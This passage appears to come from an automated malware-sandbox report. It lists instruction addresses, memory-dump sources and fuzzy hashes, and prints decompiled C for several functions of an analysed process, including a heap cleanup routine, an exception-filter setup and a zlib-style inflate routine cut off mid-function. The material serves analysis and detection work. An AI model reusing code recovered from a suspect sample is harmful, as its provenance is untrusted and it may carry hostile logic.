                                                                                                                                                  0x00408d8d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408d8f
                                                                                                                                                  0x00408d90
                                                                                                                                                  0x00408d93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408d95
                                                                                                                                                  0x00408d96
                                                                                                                                                  0x00408d9d
                                                                                                                                                  0x00408d9f
                                                                                                                                                  0x00408dbf
                                                                                                                                                  0x00408dc1
                                                                                                                                                  0x00408dc6
                                                                                                                                                  0x00408dd0
                                                                                                                                                  0x00408dd5
                                                                                                                                                  0x00408dda
                                                                                                                                                  0x00408ddd
                                                                                                                                                  0x00408de2
                                                                                                                                                  0x00408de2
                                                                                                                                                  0x00408de7
                                                                                                                                                  0x00408dee
                                                                                                                                                  0x00408df0
                                                                                                                                                  0x00408df2
                                                                                                                                                  0x00408df4
                                                                                                                                                  0x00408df4
                                                                                                                                                  0x00408dfa
                                                                                                                                                  0x00408e0d
                                                                                                                                                  0x00408e11
                                                                                                                                                  0x00408e16
                                                                                                                                                  0x00408e16
                                                                                                                                                  0x00408e16
                                                                                                                                                  0x00408e1b
                                                                                                                                                  0x00408e1f
                                                                                                                                                  0x00408e20
                                                                                                                                                  0x00408e20
                                                                                                                                                  0x00408df4
                                                                                                                                                  0x00408e26
                                                                                                                                                  0x00408e26
                                                                                                                                                  0x00408e2e
                                                                                                                                                  0x00408e6d
                                                                                                                                                  0x00408e74
                                                                                                                                                  0x00408e78
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408e30
                                                                                                                                                  0x00408e30
                                                                                                                                                  0x00408e33
                                                                                                                                                  0x00408e55
                                                                                                                                                  0x00408e5e
                                                                                                                                                  0x00408e63
                                                                                                                                                  0x00408e80
                                                                                                                                                  0x00408e80
                                                                                                                                                  0x00408e35
                                                                                                                                                  0x00408e35
                                                                                                                                                  0x00408e3d
                                                                                                                                                  0x00408e45
                                                                                                                                                  0x00408e45
                                                                                                                                                  0x00408e33
                                                                                                                                                  0x00408e8d
                                                                                                                                                  0x00408e9a
                                                                                                                                                  0x00408e9c
                                                                                                                                                  0x00408ea0
                                                                                                                                                  0x00408ea2
                                                                                                                                                  0x00408ea4
                                                                                                                                                  0x00408ea7
                                                                                                                                                  0x00408eab
                                                                                                                                                  0x00408eaf
                                                                                                                                                  0x00408eb3
                                                                                                                                                  0x00408eb7
                                                                                                                                                  0x00408eba
                                                                                                                                                  0x00408ec7
                                                                                                                                                  0x00408ece
                                                                                                                                                  0x00408ed2
                                                                                                                                                  0x00408ed2
                                                                                                                                                  0x00408ed6
                                                                                                                                                  0x00408eda
                                                                                                                                                  0x00408ee3
                                                                                                                                                  0x00408eea
                                                                                                                                                  0x00408eec
                                                                                                                                                  0x00408efa
                                                                                                                                                  0x00408f1b
                                                                                                                                                  0x00408f1d
                                                                                                                                                  0x00408f22
                                                                                                                                                  0x00408efc
                                                                                                                                                  0x00408f03
                                                                                                                                                  0x00408f10
                                                                                                                                                  0x00408f14
                                                                                                                                                  0x00408f14
                                                                                                                                                  0x00408eee
                                                                                                                                                  0x00408eee
                                                                                                                                                  0x00408ef3
                                                                                                                                                  0x00408ef3
                                                                                                                                                  0x00408f2b
                                                                                                                                                  0x00408f42
                                                                                                                                                  0x00408f4d
                                                                                                                                                  0x00408f4d
                                                                                                                                                  0x00408f4f
                                                                                                                                                  0x00408f52
                                                                                                                                                  0x00408f56
                                                                                                                                                  0x00408f56
                                                                                                                                                  0x00408f56
                                                                                                                                                  0x00408f58
                                                                                                                                                  0x00408f5a
                                                                                                                                                  0x00408f5c
                                                                                                                                                  0x00408f5c
                                                                                                                                                  0x00408f60
                                                                                                                                                  0x00408f6c
                                                                                                                                                  0x00408f6e
                                                                                                                                                  0x00408f70
                                                                                                                                                  0x00408f72
                                                                                                                                                  0x00408f72
                                                                                                                                                  0x00408f74
                                                                                                                                                  0x00408f74
                                                                                                                                                  0x00408f72
                                                                                                                                                  0x00408f78
                                                                                                                                                  0x00408f7a
                                                                                                                                                  0x00408f87
                                                                                                                                                  0x00408f87
                                                                                                                                                  0x00408f7c
                                                                                                                                                  0x00408f7c
                                                                                                                                                  0x00408f83
                                                                                                                                                  0x00408f83
                                                                                                                                                  0x00408f89
                                                                                                                                                  0x00408f93
                                                                                                                                                  0x00408f9d
                                                                                                                                                  0x00408fa0
                                                                                                                                                  0x00408fc4
                                                                                                                                                  0x00408fc4
                                                                                                                                                  0x00408fc8
                                                                                                                                                  0x00408ed2
                                                                                                                                                  0x00408ed6
                                                                                                                                                  0x00408eda
                                                                                                                                                  0x00408ee3
                                                                                                                                                  0x00408eea
                                                                                                                                                  0x00408eec
                                                                                                                                                  0x00408efa
                                                                                                                                                  0x00408f1b
                                                                                                                                                  0x00408f1d
                                                                                                                                                  0x00408f22
                                                                                                                                                  0x00408efc
                                                                                                                                                  0x00408f03
                                                                                                                                                  0x00408f10
                                                                                                                                                  0x00408f14
                                                                                                                                                  0x00408f14
                                                                                                                                                  0x00408eee
                                                                                                                                                  0x00408eee
                                                                                                                                                  0x00408ef3
                                                                                                                                                  0x00408ef3
                                                                                                                                                  0x00408f2b
                                                                                                                                                  0x00408f42
                                                                                                                                                  0x00408f4d
                                                                                                                                                  0x00408f4d
                                                                                                                                                  0x00408f4f
                                                                                                                                                  0x00408f52
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408fce
                                                                                                                                                  0x00408fce
                                                                                                                                                  0x00408fd2
                                                                                                                                                  0x00408fd4
                                                                                                                                                  0x00408fd8
                                                                                                                                                  0x00408fdc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408fe2
                                                                                                                                                  0x00408fe2
                                                                                                                                                  0x00408fe2
                                                                                                                                                  0x00408fe4
                                                                                                                                                  0x00408fe6
                                                                                                                                                  0x00408fe6
                                                                                                                                                  0x00408ff5
                                                                                                                                                  0x00408ffd
                                                                                                                                                  0x00409004
                                                                                                                                                  0x00409007
                                                                                                                                                  0x00409009
                                                                                                                                                  0x0040900d
                                                                                                                                                  0x0040900f
                                                                                                                                                  0x00409013
                                                                                                                                                  0x00409016
                                                                                                                                                  0x00409018
                                                                                                                                                  0x0040901a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040901c
                                                                                                                                                  0x0040901d
                                                                                                                                                  0x0040901e
                                                                                                                                                  0x00409021
                                                                                                                                                  0x00409023
                                                                                                                                                  0x00409027
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409027
                                                                                                                                                  0x00409029
                                                                                                                                                  0x00409029
                                                                                                                                                  0x00409034
                                                                                                                                                  0x00409038
                                                                                                                                                  0x00409040
                                                                                                                                                  0x00409044
                                                                                                                                                  0x00409054
                                                                                                                                                  0x00409054
                                                                                                                                                  0x00409056
                                                                                                                                                  0x0040905f
                                                                                                                                                  0x00409068
                                                                                                                                                  0x00409077
                                                                                                                                                  0x0040907b
                                                                                                                                                  0x00409080
                                                                                                                                                  0x00408ed2
                                                                                                                                                  0x00408ed2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408ed2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409046
                                                                                                                                                  0x00409046
                                                                                                                                                  0x0040904e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040904e
                                                                                                                                                  0x00409044
                                                                                                                                                  0x00408fdc
                                                                                                                                                  0x00408fa2
                                                                                                                                                  0x00408fa2
                                                                                                                                                  0x00408fa6
                                                                                                                                                  0x00409085
                                                                                                                                                  0x00409092
                                                                                                                                                  0x00409097
                                                                                                                                                  0x0040909b
                                                                                                                                                  0x004090a0
                                                                                                                                                  0x004090a2
                                                                                                                                                  0x004090a4
                                                                                                                                                  0x004090a8
                                                                                                                                                  0x004090a8
                                                                                                                                                  0x004090aa
                                                                                                                                                  0x004090b2
                                                                                                                                                  0x004090b6
                                                                                                                                                  0x004090b8
                                                                                                                                                  0x004090bc
                                                                                                                                                  0x004090be
                                                                                                                                                  0x004090be
                                                                                                                                                  0x004090c0
                                                                                                                                                  0x004090c4
                                                                                                                                                  0x004090c8
                                                                                                                                                  0x004090c8
                                                                                                                                                  0x004090b6
                                                                                                                                                  0x004090d4
                                                                                                                                                  0x004090df
                                                                                                                                                  0x004090e1
                                                                                                                                                  0x004090e3
                                                                                                                                                  0x004090e5
                                                                                                                                                  0x004090e5
                                                                                                                                                  0x004090e7
                                                                                                                                                  0x004090e7
                                                                                                                                                  0x004090e5
                                                                                                                                                  0x004090eb
                                                                                                                                                  0x004090ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004090ef
                                                                                                                                                  0x004090ef
                                                                                                                                                  0x004090f4
                                                                                                                                                  0x004090f4
                                                                                                                                                  0x004090f6
                                                                                                                                                  0x004090f6
                                                                                                                                                  0x004090a8
                                                                                                                                                  0x004090fa
                                                                                                                                                  0x0040910c
                                                                                                                                                  0x00409115
                                                                                                                                                  0x00409117
                                                                                                                                                  0x0040911d
                                                                                                                                                  0x00408fac
                                                                                                                                                  0x00408fba
                                                                                                                                                  0x00408fbe
                                                                                                                                                  0x00408fc2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408fc2
                                                                                                                                                  0x00408fa6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408fa0
                                                                                                                                                  0x00408ebc
                                                                                                                                                  0x00408ebc
                                                                                                                                                  0x00408ec1
                                                                                                                                                  0x0040911e
                                                                                                                                                  0x0040912a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408ec1
                                                                                                                                                  0x00408da1
                                                                                                                                                  0x00408da1
                                                                                                                                                  0x00408da3
                                                                                                                                                  0x00408daa
                                                                                                                                                  0x00408dad
                                                                                                                                                  0x00408dad
                                                                                                                                                  0x00408db4
                                                                                                                                                  0x00408da5
                                                                                                                                                  0x00408da5
                                                                                                                                                  0x00408da8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408da8
                                                                                                                                                  0x00408da3
                                                                                                                                                  0x00408d9f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00408d93
                                                                                                                                                  0x00408db7
                                                                                                                                                  0x00408db7
                                                                                                                                                  0x00408dbe
                                                                                                                                                  0x00408cf3
                                                                                                                                                  0x00408cf3
                                                                                                                                                  0x00408cfc
                                                                                                                                                  0x00408d03
                                                                                                                                                  0x00408d08
                                                                                                                                                  0x00408d0d
                                                                                                                                                  0x00408d11
                                                                                                                                                  0x00408d13
                                                                                                                                                  0x00408d18
                                                                                                                                                  0x00408d1a
                                                                                                                                                  0x00408d1d
                                                                                                                                                  0x00408d2b
                                                                                                                                                  0x00408d2b
                                                                                                                                                  0x00000000

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$@
                                                                                                                                                  • API String ID: 0-149943524
                                                                                                                                                  • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                  • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                                                                                                                  • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                                  • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040ADB0, Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}





                                                                                                                                                  0x0040adb3
                                                                                                                                                  0x0040adb5
                                                                                                                                                  0x0040adb8
                                                                                                                                                  0x0040adc0
                                                                                                                                                  0x0040adc8
                                                                                                                                                  0x0040adc8
                                                                                                                                                  0x0040adce
                                                                                                                                                  0x0040add0
                                                                                                                                                  0x0040add8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ade1
                                                                                                                                                  0x0040add8
                                                                                                                                                  0x0040ade8

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                  • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                  • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                  • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                  • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0081DF12, Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931737670.0000000000810000.00000040.00000001.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: G
                                                                                                                                                  • API String ID: 0-2023980421
                                                                                                                                                  • Opcode ID: 16990d9059143fb0b0a28bbb3c6b7bec17647837e79e27941e49b8f629e04145
                                                                                                                                                  • Instruction ID: f6fae6e7cb35c68f376337346aa072e6a4ab6346690bab9ccf775d6ce5ecf58e
                                                                                                                                                  • Opcode Fuzzy Hash: 16990d9059143fb0b0a28bbb3c6b7bec17647837e79e27941e49b8f629e04145
                                                                                                                                                  • Instruction Fuzzy Hash: 3CC1AF30A04619CBDF184F6699542EDBABAFF88341F19846DD882E7784CF388CC5DB61
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004123F1, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004123F1() {

				SetUnhandledExceptionFilter(E004123AF);
				return 0;
			}



                                                                                                                                                  0x004123f6
                                                                                                                                                  0x004123fe

                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                  • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                  • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                                  • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                                  • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0049AD80, Relevance: 1.3, Instructions: 1252COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d4f82ec2d6204f277b76630b461e5cf2f915eb695c1d7aa236e5af3acc4337e2
                                                                                                                                                  • Instruction ID: f90ab7ea0ba93b4761924a2d59141e63020db97b5b47f7c88d69678af5c9ed1f
                                                                                                                                                  • Opcode Fuzzy Hash: d4f82ec2d6204f277b76630b461e5cf2f915eb695c1d7aa236e5af3acc4337e2
                                                                                                                                                  • Instruction Fuzzy Hash: CED22D70D00A198FCB15EF68C884A9DF7B1FF99304F14C6AAD419A7251EB34AAC5CF85
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00487048, Relevance: 1.0, Instructions: 980COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9234ffe0f9656974e809234b086e1fb450bdc22c823e450aaa92dc5d813d1370
                                                                                                                                                  • Instruction ID: 00c8ef513e28ea1f720cd24a06e7c769e9dd1f6f97cdafc5a0c69f9014003e3d
                                                                                                                                                  • Opcode Fuzzy Hash: 9234ffe0f9656974e809234b086e1fb450bdc22c823e450aaa92dc5d813d1370
                                                                                                                                                  • Instruction Fuzzy Hash: FC62271150DAD54FCB32ABB44CB426D3F929F42250F784CDFC4855B297DA2DC88A876B
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00407C3F, Relevance: .8, Instructions: 783COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E00407C3F(unsigned int __ebx, signed char* __edx, signed int* __edi, signed int __esi) {
				signed int _t623;
				signed int _t626;
				signed char** _t637;
				signed int _t645;
				signed int _t649;
				signed int _t654;
				signed int _t657;
				signed int _t660;
				signed int _t662;
				signed int _t665;
				signed char _t771;
				signed char _t776;
				signed char _t778;
				signed int _t783;
				signed int _t785;
				signed int _t792;
				signed int _t795;
				signed int _t799;
				signed int _t803;
				signed int _t805;
				signed int _t813;
				unsigned int _t814;
				signed int _t815;
				signed int _t816;
				void* _t824;
				unsigned int _t828;
				unsigned int _t829;
				intOrPtr _t961;
				signed char _t962;
				signed char _t968;
				signed char _t974;
				signed char* _t989;
				signed char* _t998;
				signed int* _t1018;
				signed int _t1023;
				signed char** _t1025;
				signed char* _t1029;
				void* _t1032;
				void* _t1036;

				L0:
				while(1) {
					L0:
					_t1023 = __esi;
					_t1018 = __edi;
					_t989 = __edx;
					_t814 = __ebx;
					if(__esi >= 0xe) {
						goto L154;
					}
					L152:
					while(__edx != 0) {
						__eax =  *__ebp & 0x000000ff;
						__eax = ( *__ebp & 0x000000ff) << __cl;
						__edx = __edx - 1;
						__esi = __esi + 8;
						__ebp =  &(__ebp[1]);
						__ebx = __ebx + __eax;
						 *(__esp + 0x10) = __edx;
						if(__esi < 0xe) {
							continue;
						} else {
							goto L154;
						}
						L321:
					}
					L303:
					_t637 =  *(_t1036 + 0x40);
					_t637[3] =  *(_t1036 + 0x24);
					_t637[4] =  *(_t1036 + 0x18);
					 *_t637 = _t1029;
					_t637[1] = _t998;
					_t1018[0xe] = _t814;
					_t1018[0xf] = _t1023;
					if(_t1018[0xa] != 0 ||  *_t1018 < 0x18 &&  *(_t1036 + 0x28) != _t637[4]) {
						L306:
						if(E004072B0( *(_t1036 + 0x28),  *(_t1036 + 0x40)) == 0) {
							goto L309;
						} else {
							L307:
							 *_t1018 = 0x1c;
							L308:
							return 0xfffffffc;
						}
					} else {
						L309:
						_t1025 =  *(_t1036 + 0x40);
						_t1032 =  *((intOrPtr*)(_t1036 + 0x38)) - _t1025[1];
						_t824 =  *(_t1036 + 0x28) - _t1025[4];
						_t1025[2] =  &(_t1025[2][_t1032]);
						_t1025[5] =  &(_t1025[5][_t824]);
						_t1018[7] = _t1018[7] + _t824;
						if(_t1018[2] != 0 && _t824 != 0) {
							_push(_t824);
							if(_t1018[4] == 0) {
								_push(_t1025[3] - _t824);
								_push(_t1018[6]);
								_t649 = E004024A0();
							} else {
								_push(_t1025[3] - _t824);
								_push(_t1018[6]);
								_t649 = E00403080();
							}
							_t1018[6] = _t649;
							_t1036 = _t1036 + 0xc;
							_t1025[0xc] = _t649;
						}
						asm("sbb edx, edx");
						_t1025[0xb] = ( ~(_t1018[1]) & 0x00000040) + ((0 |  *_t1018 != 0x0000000b) - 0x00000001 & 0x00000080) + _t1018[0xf];
						if(_t1032 != 0 || _t824 != 0) {
							L317:
							if( *((intOrPtr*)(_t1036 + 0x44)) != 4) {
								L320:
								return  *(_t1036 + 0x30);
							} else {
								goto L318;
							}
						} else {
							L318:
							_t645 =  *(_t1036 + 0x30);
							if(_t645 != 0) {
								L297:
								return _t645;
							} else {
								L319:
								return 0xfffffffb;
							}
						}
					}
					goto L321;
					L154:
					_t815 = _t814 >> 5;
					_t1018[0x18] = (_t814 & 0x0000001f) + 0x101;
					_t816 = _t815 >> 5;
					_t626 = (_t815 & 0x0000001f) + 1;
					_t814 = _t816 >> 4;
					_t1023 = _t1023 - 0xe;
					_t1018[0x19] = _t626;
					_t1018[0x17] = (_t816 & 0x0000000f) + 4;
					if(_t1018[0x18] > 0x11e || _t626 > 0x1e) {
						L26:
						( *(_t1036 + 0x40))[6] = 0x41d338;
						goto L294;
					} else {
						L156:
						_t1018[0x1a] = 0;
						 *_t1018 = 0x10;
						L157:
						if(_t1018[0x1a] >= _t1018[0x17]) {
							L163:
							while(_t1018[0x1a] < 0x13) {
								L165:
								 *((short*)(_t1018 + 0x70 + ( *(0x41e468 + _t1018[0x1a] * 2) & 0x0000ffff) * 2)) = 0;
								_t1018[0x1a] = _t1018[0x1a] + 1;
							}
							L166:
							_t654 =  &(_t1018[0x14c]);
							_t1018[0x1b] = _t654;
							_t1018[0x13] = _t654;
							_t1018[0x15] = 7;
							_t657 = E00408C60(0,  &(_t1018[0x1c]), 0x13,  &(_t1018[0x1b]),  &(_t1018[0x15]),  &(_t1018[0xbc]));
							_t998 =  *(_t1036 + 0x28);
							_t1036 = _t1036 + 0x18;
							 *(_t1036 + 0x30) = _t657;
							if(_t657 != 0) {
								L293:
								( *(_t1036 + 0x40))[6] = 0x41d338;
								goto L294;
							} else {
								L167:
								_t1018[0x1a] = _t657;
								 *_t1018 = 0x11;
								L168:
								if(_t1018[0x1a] >= _t1018[0x19] + _t1018[0x18]) {
									L201:
									if( *_t1018 == 0x1b) {
										goto L295;
									} else {
										L202:
										_t660 =  &(_t1018[0x14c]);
										_t1018[0x1b] = _t660;
										_t1018[0x13] = _t660;
										_t1018[0x15] = 9;
										_t662 = E00408C60(1,  &(_t1018[0x1c]), _t1018[0x18],  &(_t1018[0x1b]),  &(_t1018[0x15]),  &(_t1018[0xbc]));
										_t1036 = _t1036 + 0x18;
										 *(_t1036 + 0x30) = _t662;
										if(_t662 == 0) {
											L204:
											_t1018[0x14] = _t1018[0x1b];
											_t1018[0x16] = 6;
											_t665 = E00408C60(2, _t1018 + 0x70 + _t1018[0x18] * 2, _t1018[0x19],  &(_t1018[0x1b]),  &(_t1018[0x16]),  &(_t1018[0xbc]));
											_t998 =  *(_t1036 + 0x28);
											_t1036 = _t1036 + 0x18;
											 *(_t1036 + 0x30) = _t665;
											if(_t665 == 0) {
												L206:
												 *_t1018 = 0x12;
												goto L207;
											} else {
												L205:
												( *(_t1036 + 0x40))[6] = 0x41d338;
												goto L294;
											}
										} else {
											L203:
											_t998 =  *(_t1036 + 0x10);
											( *(_t1036 + 0x40))[6] = 0x41d338;
											L294:
											 *_t1018 = 0x1b;
											while(1) {
												L295:
												_t623 =  *_t1018;
												if(_t623 > 0x1c) {
													break;
												}
												L1:
												switch( *((intOrPtr*)(_t623 * 4 +  &M004087C4))) {
													case 0:
														L2:
														if(_t1018[2] != 0) {
															L4:
															if(_t1023 >= 0x10) {
																L8:
																if((_t1018[2] & 0x00000002) == 0 || _t814 != 0x8b1f) {
																	_t628 = _t1018[8];
																	_t1018[4] = 0;
																	if(_t628 != 0) {
																		 *((intOrPtr*)(_t628 + 0x30)) = 0xffffffff;
																	}
																	L13:
																	if((_t1018[2] & 0x00000001) == 0 || (((_t814 & 0x000000ff) << 8) + (_t814 >> 8)) % 0x1f != 0) {
																		( *(_t1036 + 0x40))[6] = 0x41d338;
																		goto L294;
																	} else {
																		L15:
																		if((_t814 & 0x0000000f) == 8) {
																			L17:
																			_t814 = _t814 >> 4;
																			_t848 = (_t814 & 0x0000000f) + 8;
																			_t1023 = _t1023 - 4;
																			if(_t848 <= _t1018[9]) {
																				_push(0);
																				_push(0);
																				_push(0);
																				_t1018[5] = 1 << _t848;
																				_t633 = E004024A0();
																				_t998 =  *(_t1036 + 0x1c);
																				_t1018[6] = _t633;
																				 *( *((intOrPtr*)(_t1036 + 0x4c)) + 0x30) = _t633;
																				 *_t1018 =  !(_t814 >> 8) & 0x00000002 | 0x00000009;
																				_t1036 = _t1036 + 0xc;
																				_t814 = 0;
																				_t1023 = 0;
																			} else {
																				_t998 =  *(_t1036 + 0x10);
																				goto L293;
																			}
																		} else {
																			_t998 =  *(_t1036 + 0x10);
																			( *(_t1036 + 0x40))[6] = 0x41d338;
																			goto L294;
																		}
																	}
																} else {
																	_t1018[6] = E00403080(0, 0, 0);
																	 *(_t1036 + 0x2c) = 0x1f;
																	 *(_t1036 + 0x2d) = 0x8b;
																	_t636 = E00403080(_t1018[6], _t1036 + 0x2c, 2);
																	_t998 =  *(_t1036 + 0x28);
																	_t1036 = _t1036 + 0x18;
																	_t814 = 0;
																	_t1018[6] = _t636;
																	_t1023 = 0;
																	 *_t1018 = 1;
																}
																goto L295;
															} else {
																L6:
																while(_t998 != 0) {
																	_t652 = ( *_t1029 & 0x000000ff) << _t1023;
																	_t998 = _t998 - 1;
																	_t1023 = _t1023 + 8;
																	_t1029 =  &(_t1029[1]);
																	_t814 = _t814 + _t652;
																	 *(_t1036 + 0x10) = _t998;
																	if(_t1023 < 0x10) {
																		continue;
																	} else {
																		goto L8;
																	}
																	goto L321;
																}
																goto L303;
															}
														} else {
															 *_t1018 = 0xc;
															goto L295;
														}
														goto L321;
													case 1:
														L21:
														if(__esi >= 0x10) {
															L24:
															 *(__edi + 0x10) = __ebx;
															if(__bl != 8) {
																goto L293;
															} else {
																L25:
																if((__ebx & 0x0000e000) == 0) {
																	L27:
																	__eax =  *(__edi + 0x20);
																	if(__eax != 0) {
																		__ebx = __ebx >> 8;
																		__ecx = __ebx >> 0x00000008 & 0x00000001;
																		 *__eax = __ebx >> 0x00000008 & 0x00000001;
																	}
																	if(( *(__edi + 0x10) & 0x00000200) != 0) {
																		 *(__esp + 0x1c) = __bl;
																		__ebx = __ebx >> 8;
																		__edx = __esp + 0x20;
																		 *(__esp + 0x21) = __bl;
																		__eax =  *(__edi + 0x18);
																		__eax = E00403080( *(__edi + 0x18), __esp + 0x20, 2);
																		__edx =  *(__esp + 0x1c);
																		 *(__edi + 0x18) = __eax;
																	}
																	__ebx = 0;
																	__esi = 0;
																	 *__edi = 2;
																	goto L34;
																} else {
																	goto L26;
																}
															}
														} else {
															L22:
															while(__edx != 0) {
																__eax =  *__ebp & 0x000000ff;
																__ecx = __esi;
																__eax = ( *__ebp & 0x000000ff) << __cl;
																__edx = __edx - 1;
																__esi = __esi + 8;
																__ebp =  &(__ebp[1]);
																__ebx = __ebx + __eax;
																 *(__esp + 0x10) = __edx;
																if(__esi < 0x10) {
																	continue;
																} else {
																	goto L24;
																}
																goto L321;
															}
															goto L303;
														}
														goto L321;
													case 2:
														L32:
														if(__esi >= 0x20) {
															L36:
															__eax =  *(__edi + 0x20);
															if(__eax != 0) {
																 *(__eax + 4) = __ebx;
															}
															if(( *(__edi + 0x10) & 0x00000200) != 0) {
